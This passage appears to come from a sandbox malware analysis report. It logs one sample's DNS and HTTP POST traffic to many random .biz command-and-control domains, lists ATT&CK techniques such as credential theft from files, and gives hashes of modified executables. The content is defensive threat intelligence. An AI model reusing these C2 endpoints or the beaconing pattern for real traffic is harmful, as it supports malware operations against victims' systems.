Set-Cookie: btst=45ecc0d0a870e5f96f0b12492419ddfa|191.101.209.39|1716145885|1716145885|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

lejtdj.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lejtdj.biz

IN A

Response
DNS

lejtdj.biz

alg.exe

Remote address:

8.8.8.8:53

Request

lejtdj.biz

IN A

Response
DNS

vyome.biz

alg.exe

Remote address:

8.8.8.8:53

Request

vyome.biz

IN A

Response

vyome.biz

IN A

44.213.104.86
POST

http://vyome.biz/lfrpqswndsa

alg.exe

Remote address:

44.213.104.86:80

Request

POST /lfrpqswndsa HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vyome.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 782

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 19 May 2024 19:11:25 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=3b7e68a2070caaa6b7fbdd1b7ba59189|191.101.209.39|1716145885|1716145885|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

yauexmxk.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yauexmxk.biz

IN A

Response

yauexmxk.biz

IN A

54.80.154.23
DNS

yauexmxk.biz

alg.exe

Remote address:

8.8.8.8:53

Request

yauexmxk.biz

IN A

Response

yauexmxk.biz

IN A

54.80.154.23

35.91.124.102:80

http://pywolwnvd.biz/vhmmxjjif

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://pywolwnvd.biz/vhmmxjjif

HTTP Response

200
35.91.124.102:80

http://pywolwnvd.biz/aboqnjlnnl

http

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

1.5kB
661 B
6
6

HTTP Request

POST http://pywolwnvd.biz/aboqnjlnnl

HTTP Response

200
18.141.10.107:80

http://ssbzmoy.biz/xq

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://ssbzmoy.biz/xq

HTTP Response

200
18.141.10.107:80

http://ssbzmoy.biz/xq

http

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

1.5kB
667 B
6
6

HTTP Request

POST http://ssbzmoy.biz/xq

HTTP Response

200
54.244.188.177:80

http://cvgrf.biz/txyjj

http

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

1.5kB
665 B
6
6

HTTP Request

POST http://cvgrf.biz/txyjj

HTTP Response

200
54.244.188.177:80

http://cvgrf.biz/pek

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://cvgrf.biz/pek

HTTP Response

200
44.221.84.105:80

http://npukfztj.biz/unactr

http

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

1.5kB
668 B
6
6

HTTP Request

POST http://npukfztj.biz/unactr

HTTP Response

200
44.221.84.105:80

http://npukfztj.biz/drgtbhjnlndog

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://npukfztj.biz/drgtbhjnlndog

HTTP Response

200
54.157.24.8:80

http://przvgke.biz/a

http

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

1.4kB
172 B
4
4

HTTP Request

POST http://przvgke.biz/a
54.157.24.8:80

http://przvgke.biz/ruca

http

alg.exe

1.3kB
172 B
4
4

HTTP Request

POST http://przvgke.biz/ruca
54.157.24.8:80

http://przvgke.biz/fsdcxictkrit

http

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

1.4kB
172 B
4
4

HTTP Request

POST http://przvgke.biz/fsdcxictkrit
54.157.24.8:80

http://przvgke.biz/mrxhvkbvgys

http

alg.exe

1.3kB
172 B
4
4

HTTP Request

POST http://przvgke.biz/mrxhvkbvgys
18.141.10.107:80

http://knjghuig.biz/vfxxyhxhf

http

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

1.5kB
660 B
6
6

HTTP Request

POST http://knjghuig.biz/vfxxyhxhf

HTTP Response

200
18.141.10.107:80

http://knjghuig.biz/nthdnqdbrpf

http

alg.exe

1.4kB
660 B
6
6

HTTP Request

POST http://knjghuig.biz/nthdnqdbrpf

HTTP Response

200
82.112.184.197:80

lpuegx.biz

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

52 B
1
82.112.184.197:80

lpuegx.biz

alg.exe

260 B
5
204.79.197.237:443

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De81sELozKf4LgTBRX6sRC-dzVUCUxwxKvoVZg92AeXYqVB1TUbzieHCV_KvbS4F5JtioRB8ve5TCcl6YjhMpSC9nPrsVQ2GiZldhZLgOW0cLVGBYyY3KuJ0rQx0buv6zQKWMR1syO7iBcNN4Srg4vdQIXzN28WG_01-pY8_tCVRiGl6d9z%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4bd351ef81561996d01937d4e94e6372&TIME=20240508T115637Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

tls, http2

2.5kB
8.9kB
19
15

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De81sELozKf4LgTBRX6sRC-dzVUCUxwxKvoVZg92AeXYqVB1TUbzieHCV_KvbS4F5JtioRB8ve5TCcl6YjhMpSC9nPrsVQ2GiZldhZLgOW0cLVGBYyY3KuJ0rQx0buv6zQKWMR1syO7iBcNN4Srg4vdQIXzN28WG_01-pY8_tCVRiGl6d9z%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4bd351ef81561996d01937d4e94e6372&TIME=20240508T115637Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De81sELozKf4LgTBRX6sRC-dzVUCUxwxKvoVZg92AeXYqVB1TUbzieHCV_KvbS4F5JtioRB8ve5TCcl6YjhMpSC9nPrsVQ2GiZldhZLgOW0cLVGBYyY3KuJ0rQx0buv6zQKWMR1syO7iBcNN4Srg4vdQIXzN28WG_01-pY8_tCVRiGl6d9z%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4bd351ef81561996d01937d4e94e6372&TIME=20240508T115637Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

HTTP Response

204
88.221.83.203:443

https://www.bing.com/aes/c.gif?RG=8da969ca3c8e4167bdcebe09b4682839&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T115637Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981

tls, http2

1.5kB
5.4kB
17
12

HTTP Request

GET https://www.bing.com/aes/c.gif?RG=8da969ca3c8e4167bdcebe09b4682839&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T115637Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981

HTTP Response

200
82.112.184.197:80

lpuegx.biz

alg.exe

260 B
5
82.112.184.197:80

vjaxhpbji.biz

alg.exe

260 B
5
82.112.184.197:80

vjaxhpbji.biz

alg.exe

260 B
5
44.200.43.61:80

http://xlfhhhm.biz/yumbgkyammrp

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://xlfhhhm.biz/yumbgkyammrp

HTTP Response

200
13.251.16.150:80

http://ifsaia.biz/ehfbrjk

http

alg.exe

2.6kB
578 B
7
4

HTTP Request

POST http://ifsaia.biz/ehfbrjk

HTTP Response

200
3.237.86.197:80

http://saytjshyf.biz/axmfwxqqokolryp

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://saytjshyf.biz/axmfwxqqokolryp

HTTP Response

200
18.141.10.107:80

http://vcddkls.biz/xqxepvdyam

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://vcddkls.biz/xqxepvdyam

HTTP Response

200
128.248.79.0:80

alg.exe

260 B
5
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
14
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239360313430_12K7UVO7ZVIINTRIE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

tls, http2

105.4kB
3.0MB
2180
2175

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340783932_1JCHO8JLBZ4TPAX49&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239340783933_1QOIM48UV8MGOV4SU&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360313429_1X5GXWWD8KTODKAD6&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360313430_12K7UVO7ZVIINTRIE&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
13
128.248.79.0:80

alg.exe

260 B
5
34.246.200.160:80

http://tbjrpv.biz/ssq

http

alg.exe

1.4kB
666 B
6
6

HTTP Request

POST http://tbjrpv.biz/ssq

HTTP Response

200
54.80.154.23:80

http://deoci.biz/ypnygbtaknx

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://deoci.biz/ypnygbtaknx

HTTP Response

200
208.100.26.245:80

http://yunalwv.biz/pepwujfjvcb

http

alg.exe

5.0kB
3.4kB
12
10

HTTP Request

POST http://gytujflc.biz/ordrqnmagx

HTTP Response

404

HTTP Request

POST http://gytujflc.biz/tdorc

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/lvdnphx

HTTP Response

404

HTTP Request

POST http://yunalwv.biz/pepwujfjvcb

HTTP Response

404
13.251.16.150:80

http://qaynky.biz/hbwmxumxxebfx

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://qaynky.biz/hbwmxumxxebfx

HTTP Response

200
44.221.84.105:80

http://bumxkqgxu.biz/ragioimcmpin

http

alg.exe

1.5kB
709 B
7
7

HTTP Request

POST http://bumxkqgxu.biz/ragioimcmpin

HTTP Response

200
35.91.124.102:80

http://dwrqljrr.biz/wlxihhxl

http

alg.exe

1.4kB
660 B
6
6

HTTP Request

POST http://dwrqljrr.biz/wlxihhxl

HTTP Response

200
35.164.78.200:80

http://nqwjmb.biz/hscb

http

alg.exe

1.4kB
658 B
6
6

HTTP Request

POST http://nqwjmb.biz/hscb

HTTP Response

200
3.94.10.34:80

http://ytctnunms.biz/y

http

alg.exe

1.4kB
669 B
6
6

HTTP Request

POST http://ytctnunms.biz/y

HTTP Response

200
165.160.13.20:80

http://myups.biz/wdauljojqxebqqv

http

alg.exe

2.6kB
628 B
7
7

HTTP Request

POST http://myups.biz/emgbecgegqbw

HTTP Response

200

HTTP Request

POST http://myups.biz/wdauljojqxebqqv

HTTP Response

200
35.91.124.102:80

http://oshhkdluh.biz/kavcfc

http

alg.exe

1.4kB
661 B
6
6

HTTP Request

POST http://oshhkdluh.biz/kavcfc

HTTP Response

200
34.211.97.45:80

http://jpskm.biz/ciq

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://jpskm.biz/ciq

HTTP Response

200
35.91.124.102:80

http://lrxdmhrr.biz/exyd

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://lrxdmhrr.biz/exyd

HTTP Response

200
18.141.10.107:80

http://wllvnzb.biz/fuavl

http

alg.exe

1.4kB
659 B
6
6

HTTP Request

POST http://wllvnzb.biz/fuavl

HTTP Response

200
54.80.154.23:80

http://gnqgo.biz/ibspxmt

http

alg.exe

1.4kB
665 B
6
6

HTTP Request

POST http://gnqgo.biz/ibspxmt

HTTP Response

200
3.237.86.197:80

http://jhvzpcfg.biz/nu

http

alg.exe

1.4kB
668 B
6
6

HTTP Request

POST http://jhvzpcfg.biz/nu

HTTP Response

200
18.141.10.107:80

http://acwjcqqv.biz/agqbafxpnosw

http

alg.exe

1.4kB
620 B
6
5

HTTP Request

POST http://acwjcqqv.biz/agqbafxpnosw

HTTP Response

200
44.213.104.86:80

http://vyome.biz/lfrpqswndsa

http

alg.exe

1.4kB
657 B
6
6

HTTP Request

POST http://vyome.biz/lfrpqswndsa

HTTP Response

200

8.8.8.8:53

pywolwnvd.biz

dns

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

59 B
75 B
1
1

DNS Request

pywolwnvd.biz

DNS Response

35.91.124.102
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

91.90.14.23.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

91.90.14.23.in-addr.arpa
8.8.8.8:53

ssbzmoy.biz

dns

1f0eddd4b0780161f15abb19854525c0_NeikiAnalytics.exe

57 B
73 B
1
1

DNS Request

ssbzmoy.biz

DNS Response

18.141.10.107
8.8.8.8:53

102.124.91.35.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

102.124.91.35.in-addr.arpa
8.8.8.8:53

cvgrf.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

cvgrf.biz

DNS Response

54.244.188.177
8.8.8.8:53

cvgrf.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

cvgrf.biz

DNS Response

54.244.188.177
8.8.8.8:53

107.10.141.18.in-addr.arpa

dns

72 B
140 B
1
1

DNS Request

107.10.141.18.in-addr.arpa
8.8.8.8:53

npukfztj.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

npukfztj.biz

DNS Response

44.221.84.105
8.8.8.8:53

npukfztj.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

npukfztj.biz

DNS Response

44.221.84.105
8.8.8.8:53

przvgke.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

przvgke.biz

DNS Response

54.157.24.8
8.8.8.8:53

przvgke.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

przvgke.biz

DNS Response

54.157.24.8
8.8.8.8:53

177.188.244.54.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

177.188.244.54.in-addr.arpa
8.8.8.8:53

22.160.190.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.160.190.20.in-addr.arpa
8.8.8.8:53

8.24.157.54.in-addr.arpa

dns

70 B
123 B
1
1

DNS Request

8.24.157.54.in-addr.arpa
8.8.8.8:53

105.84.221.44.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

105.84.221.44.in-addr.arpa
8.8.8.8:53

zlenh.biz

dns

alg.exe

55 B
117 B
1
1

DNS Request

zlenh.biz
8.8.8.8:53

knjghuig.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

knjghuig.biz

DNS Response

18.141.10.107
8.8.8.8:53

zlenh.biz

dns

alg.exe

55 B
117 B
1
1

DNS Request

zlenh.biz
8.8.8.8:53

knjghuig.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

knjghuig.biz

DNS Response

18.141.10.107
8.8.8.8:53

uhxqin.biz

dns

alg.exe

56 B
118 B
1
1

DNS Request

uhxqin.biz
8.8.8.8:53

anpmnmxo.biz

dns

alg.exe

58 B
120 B
1
1

DNS Request

anpmnmxo.biz
8.8.8.8:53

lpuegx.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

lpuegx.biz

DNS Response

82.112.184.197
8.8.8.8:53

uhxqin.biz

dns

alg.exe

56 B
118 B
1
1

DNS Request

uhxqin.biz
8.8.8.8:53

anpmnmxo.biz

dns

alg.exe

58 B
120 B
1
1

DNS Request

anpmnmxo.biz
8.8.8.8:53

lpuegx.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

lpuegx.biz

DNS Response

82.112.184.197
8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.237

13.107.21.237
8.8.8.8:53

237.197.79.204.in-addr.arpa

dns

73 B
143 B
1
1

DNS Request

237.197.79.204.in-addr.arpa
8.8.8.8:53

203.83.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

203.83.221.88.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

50.23.12.20.in-addr.arpa

dns

70 B
156 B
1
1

DNS Request

50.23.12.20.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

vjaxhpbji.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

vjaxhpbji.biz

DNS Response

82.112.184.197
8.8.8.8:53

98.58.20.217.in-addr.arpa

dns

71 B
131 B
1
1

DNS Request

98.58.20.217.in-addr.arpa
8.8.8.8:53

xlfhhhm.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

xlfhhhm.biz

DNS Response

44.200.43.61
8.8.8.8:53

ifsaia.biz

dns

alg.exe

112 B
144 B
2
2

DNS Request

ifsaia.biz

DNS Request

ifsaia.biz

DNS Response

13.251.16.150

DNS Response

13.251.16.150
8.8.8.8:53

61.43.200.44.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

61.43.200.44.in-addr.arpa
8.8.8.8:53

150.16.251.13.in-addr.arpa

dns

72 B
140 B
1
1

DNS Request

150.16.251.13.in-addr.arpa
8.8.8.8:53

saytjshyf.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

saytjshyf.biz

DNS Response

3.237.86.197
8.8.8.8:53

vcddkls.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

vcddkls.biz

DNS Response

18.141.10.107
8.8.8.8:53

197.86.237.3.in-addr.arpa

dns

142 B
250 B
2
2

DNS Request

197.86.237.3.in-addr.arpa

DNS Request

197.86.237.3.in-addr.arpa
8.8.8.8:53

fwiwk.biz

dns

alg.exe

110 B
200 B
2
2

DNS Request

fwiwk.biz

DNS Request

fwiwk.biz

DNS Response

199.59.243.225

DNS Response

199.59.243.225
8.8.8.8:53

tse1.mm.bing.net

dns

124 B
346 B
2
2

DNS Request

tse1.mm.bing.net

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

57.169.31.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

57.169.31.20.in-addr.arpa
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

200.197.79.204.in-addr.arpa
8.8.8.8:53

tbjrpv.biz

dns

alg.exe

112 B
144 B
2
2

DNS Request

tbjrpv.biz

DNS Request

tbjrpv.biz

DNS Response

34.246.200.160

DNS Response

34.246.200.160
8.8.8.8:53

deoci.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

deoci.biz

DNS Response

54.80.154.23
8.8.8.8:53

gytujflc.biz

dns

alg.exe

116 B
148 B
2
2

DNS Request

gytujflc.biz

DNS Request

gytujflc.biz

DNS Response

208.100.26.245

DNS Response

208.100.26.245
8.8.8.8:53

qaynky.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

qaynky.biz

DNS Response

13.251.16.150
8.8.8.8:53

160.200.246.34.in-addr.arpa

dns

73 B
137 B
1
1

DNS Request

160.200.246.34.in-addr.arpa
8.8.8.8:53

23.154.80.54.in-addr.arpa

dns

142 B
250 B
2
2

DNS Request

23.154.80.54.in-addr.arpa

DNS Request

23.154.80.54.in-addr.arpa
8.8.8.8:53

245.26.100.208.in-addr.arpa

dns

73 B
127 B
1
1

DNS Request

245.26.100.208.in-addr.arpa
8.8.8.8:53

bumxkqgxu.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

bumxkqgxu.biz

DNS Response

44.221.84.105
8.8.8.8:53

dwrqljrr.biz

dns

alg.exe

116 B
148 B
2
2

DNS Request

dwrqljrr.biz

DNS Request

dwrqljrr.biz

DNS Response

35.91.124.102

DNS Response

35.91.124.102
8.8.8.8:53

nqwjmb.biz

dns

alg.exe

56 B
72 B
1
1

DNS Request

nqwjmb.biz

DNS Response

35.164.78.200
8.8.8.8:53

ytctnunms.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

ytctnunms.biz

DNS Response

3.94.10.34
8.8.8.8:53

myups.biz

dns

alg.exe

110 B
174 B
2
2

DNS Request

myups.biz

DNS Request

myups.biz

DNS Response

165.160.13.20

165.160.15.20

DNS Response

165.160.13.20

165.160.15.20
8.8.8.8:53

oshhkdluh.biz

dns

alg.exe

59 B
75 B
1
1

DNS Request

oshhkdluh.biz

DNS Response

35.91.124.102
8.8.8.8:53

200.78.164.35.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

200.78.164.35.in-addr.arpa
8.8.8.8:53

34.10.94.3.in-addr.arpa

dns

138 B
242 B
2
2

DNS Request

34.10.94.3.in-addr.arpa

DNS Request

34.10.94.3.in-addr.arpa
8.8.8.8:53

yunalwv.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

yunalwv.biz

DNS Response

208.100.26.245
8.8.8.8:53

jpskm.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

jpskm.biz

DNS Response

34.211.97.45
8.8.8.8:53

20.13.160.165.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

20.13.160.165.in-addr.arpa
8.8.8.8:53

lrxdmhrr.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

lrxdmhrr.biz

DNS Response

35.91.124.102
8.8.8.8:53

wllvnzb.biz

dns

alg.exe

57 B
73 B
1
1

DNS Request

wllvnzb.biz

DNS Response

18.141.10.107
8.8.8.8:53

45.97.211.34.in-addr.arpa

dns

142 B
266 B
2
2

DNS Request

45.97.211.34.in-addr.arpa

DNS Request

45.97.211.34.in-addr.arpa
8.8.8.8:53

gnqgo.biz

dns

alg.exe

110 B
142 B
2
2

DNS Request

gnqgo.biz

DNS Request

gnqgo.biz

DNS Response

54.80.154.23

DNS Response

54.80.154.23
8.8.8.8:53

jhvzpcfg.biz

dns

alg.exe

58 B
74 B
1
1

DNS Request

jhvzpcfg.biz

DNS Response

3.237.86.197
8.8.8.8:53

acwjcqqv.biz

dns

alg.exe

116 B
148 B
2
2

DNS Request

acwjcqqv.biz

DNS Request

acwjcqqv.biz

DNS Response

18.141.10.107

DNS Response

18.141.10.107
8.8.8.8:53

lejtdj.biz

dns

alg.exe

112 B
236 B
2
2

DNS Request

lejtdj.biz

DNS Request

lejtdj.biz
8.8.8.8:53

vyome.biz

dns

alg.exe

55 B
71 B
1
1

DNS Request

vyome.biz

DNS Response

44.213.104.86
8.8.8.8:53

yauexmxk.biz

dns

alg.exe

116 B
148 B
2
2

DNS Request

yauexmxk.biz

DNS Request

yauexmxk.biz

DNS Response

54.80.154.23

DNS Response

54.80.154.23

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe

Filesize
2.1MB

MD5
217f565d8300d1e1e398bbcd8cf78796

SHA1
75248defa1659eac51c46958fa2114d5d106d1b8

SHA256
2ea184718aef9f2adc0495b77de54d9a4c6b18db924b561da37b930945c8cb3a

SHA512
d8b57063afe0a8d7ea5d36d26852cef93d38ce1a26dfeb7b361d78c9026e1e362aa450626c019ff977598b5f29297f766b422b6d8a3a0243a63d3cde269d3481

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
797KB

MD5
f2d16e53e260755f5e6703c750cae4ac

SHA1
ed31bc599727b4f6a1b6c8d4f085a88f1323d39f

SHA256
88b387f1092299fbce81a821c3d8cd6edf788e458261ce6d69b5e2aa2795a28d

SHA512
79c891bcd8291195c67af0dadf5c8d898e6bd334f5c8e8182e0003edfba5eaed856b5b2f55a0da151bec00b3ba81ff15bcbfc891f5947dd2e6d18f9ef4324f20

Download Submit
C:\Program Files\7-Zip\7z.exe

Filesize
1.1MB

MD5
55342d112552ea78af5d97a526dc7d4a

SHA1
a4b178c91b949a84b3d5a7812bdbaf316da0028a

SHA256
a4a918bd8075de350fba5614b2d5b458ed4b9fd39cfe9b8e8f567728e65cb57c

SHA512
f1bbbafa5b1ff28553311b527ff0e9718e71dae10ab8f7b885734ff31104f34f89c0e91833698dc5f30a11a6f912adb05c74466dd88da4ed96ffb22bd180777d

Download Submit
C:\Program Files\7-Zip\7zFM.exe

Filesize
1.5MB

MD5
6d941aaeaa991109ee80a01fea76dc81

SHA1
1fbff8fccddd31c67a1c88d3eb39d2d921e7f300

SHA256
acbdc5232e0142061a9a991ad07d6c4191e8307d593ac41e0149f54b8c047b3d

SHA512
416ce9ae89de191a11fca3485ef300b0a7822469d523f9f8428e394f768b321f9fe9037ab3db8d8788c60af807dce94996604b989607537e5c0d665641684f18

Download Submit
C:\Program Files\7-Zip\7zG.exe

Filesize
1.2MB

MD5
cb156bc1a4245a9fbc2d456ceb319dbd

SHA1
f62c2cfea13577a140e7a9fda0ad22f885e0441a

SHA256
9b2d502929f7a581cc9c2f1fdaa9cfd2b6fcb782d09df28743572da9a1ffbdf8

SHA512
b1b07172315f22942efdee7e0ef6cb321d201a8b98f4a97d4e1c9ea71f5227d3e5c68c97f69a2d0c75efda72eabc3b75d11b14d0dc4cce30ee492cefa327dfd7

Download Submit
C:\Program Files\7-Zip\Uninstall.exe

Filesize
582KB

MD5
1746d8e1efb9caa0742a1ee6df2b8bb1

SHA1
04f7bdae597f2e46e89cf0d85002d97bfa8f12dd

SHA256
f9ea1f173cf8da34fcd4eefc38c0dd9baf8a222c910cca7b5fddf6b7dfd0d592

SHA512
4f60d0c3f8caea12d1e52cbe784090246873dbf3c1676161ce86bf6a16ab92301c8cdd9093f24c067b0893dc7e2429670d261b3636b18475d4d50092e19cd032

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe

Filesize
840KB

MD5
5d3742bf9cc70a23c266293ca8cd48ce

SHA1
55ce2464aae2a95ae868356ed6a47cf5bc8b03f2

SHA256
135710828e8d017a31a28f17b751238316e311bfbfd30a3e7d87c9e972f9a96d

SHA512
50439578310d4fdcb52a40945507a31dfd75d6cf84e9cc51bddf6090ef66dd8fa4d45595b17e1be9056cb9132b4df61a9c4d1e07650b6916fc30a72503508191

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe

Filesize
4.6MB

MD5
a64d0aae601e9b282e211dcc503edce5

SHA1
2210284e5441445a03293f1eb551607f574aefdf

SHA256
2bf55bbd74dd4ae8d7793af78882b98846396df0e8e73d689fba05419eb55949

SHA512
3675b9720a7779504d7e69d029147b5916dbc0d1ecb71b88c2fe6f854afb34284e1f431bb37dbd8869d5a187cb5a04e6127691422613505917b1bdf373a05ec6

Download Submit
C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe

Filesize
910KB

MD5
567fcea1b0da116dc03be62c267f4b66

SHA1
